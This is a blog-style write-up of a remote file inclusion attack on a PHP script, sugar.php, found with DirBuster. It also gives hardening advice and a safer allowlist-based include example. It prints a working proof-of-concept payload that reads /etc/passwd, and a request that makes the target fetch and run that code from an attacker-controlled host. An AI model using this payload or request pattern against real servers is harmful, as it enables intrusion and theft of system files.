Exploiting unlinked content using DirBuster, PHP Include() and getting Remote Command Execution (RCE)



This is a real world example. Using DirBuster we were able to discover an unlinked file named sugar.php. Requesting the "sugar.php" resource directly returned the PHP error message "<b>Error</b>: include(): Filename cannot be empty in", which told us the script hands a request parameter to include(). The valid parameter name "display=" was found using a custom parameter brute forcing script. Passing the display variable a URL pointing at a remote server we controlled caused the target to fetch and execute arbitrary code, running with elevated privileges. This means that the server is now owned: we can now execute arbitrary code as root!

Mistake number one should be axiomatic: never run a webserver with system privileges. If you are running the Apache daemon, launch the webserver as that dedicated user and restrict the account's access to the absolute minimum required to operate your webserver. Code execution was possible because the PHP include() statement interprets the PHP code in whatever file is passed to it in the function call. Because user input was passed directly to this function, it allowed for arbitrary code execution. There are a lot of mistakes this particular admin made. I would advise any of you who are webmasters to check your servers right now and make sure you don't have any directories or files you forgot about that could be misused to gain access to your server.
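As an added example (not code from the original post), here is a minimal reconstruction of the pattern that makes a script like sugar.php exploitable, next to a hardened form that never lets the client choose a path; the template names, directory and function names are assumptions.

```php
<?php
// Added example, not the original sugar.php: the vulnerable pattern and a fix.
// Template names, the templates/ directory and function names are assumptions.

// VULNERABLE: the request parameter is used as-is as the include() path.
// With allow_url_include=On, display=http://... makes PHP fetch and run
// remote code; even with it Off, a client-chosen path still reaches local files.
function render_vulnerable(array $get): void
{
    include($get['display']);                  // attacker-controlled path
}

// HARDENED: the parameter is only a key into a fixed allowlist (assumed names).
// Nothing the client sends is ever used to build a filesystem or URL path.
const TEMPLATES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
    'about'   => 'about.php',
];

function resolve_template(?string $display): ?string
{
    if ($display === null || !array_key_exists($display, TEMPLATES)) {
        return null;                            // unknown key: refuse, do not guess
    }
    return __DIR__ . '/templates/' . TEMPLATES[$display];
}

function render_hardened(array $get): void
{
    $path = resolve_template($get['display'] ?? null);
    if ($path === null) {
        http_response_code(404);                // no echo of the bad value either
        return;
    }
    include $path;                              // path chosen by the server
}

// Defence in depth in php.ini, independent of the application code:
//   allow_url_include = Off   ; include()/require() never fetch URLs
//   allow_url_fopen   = Off   ; unless the app genuinely needs remote streams
//   display_errors    = Off   ; the "Filename cannot be empty" hint leaked here
render_hardened($_GET);
```

Pair this with running PHP under an unprivileged account: even a successful include of attacker code then lands in an account with no business reading /etc/shadow or writing outside the web root.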

Here is what the attack looks like:

Here is our proof of concept code – unlinked.php (the original post used typographic quotes, which PHP does not accept; straight quotes are the working form):
<?php echo system('uname -a && cat /etc/passwd'); ?>

Here is our get request to the vulnerable script:

GET /sugar.php?display=http://192.168.1.100:9999/unlinked.php HTTP/1.1
Host: xxxxxxxxxxxxxxxxxxx.org
User-Agent: Mozilla/5.0 (Windows NT 6.4) Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate

Server Response to query:
HTTP/1.1 200 OK
Date: Mon, 07 Sep 2015 11:36:56 GMT
Server: Apache/2.4.12 PHP/5.5.21 OpenSSL/1.0.1a
X-Powered-By: PHP/5.5.21
Content-Length: 2304
Connection: close
Content-Type: text/html

Linux TakemeHome 3.16.0-37-generic #51-Ubuntu SMP Tue May 5 13:45:59 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux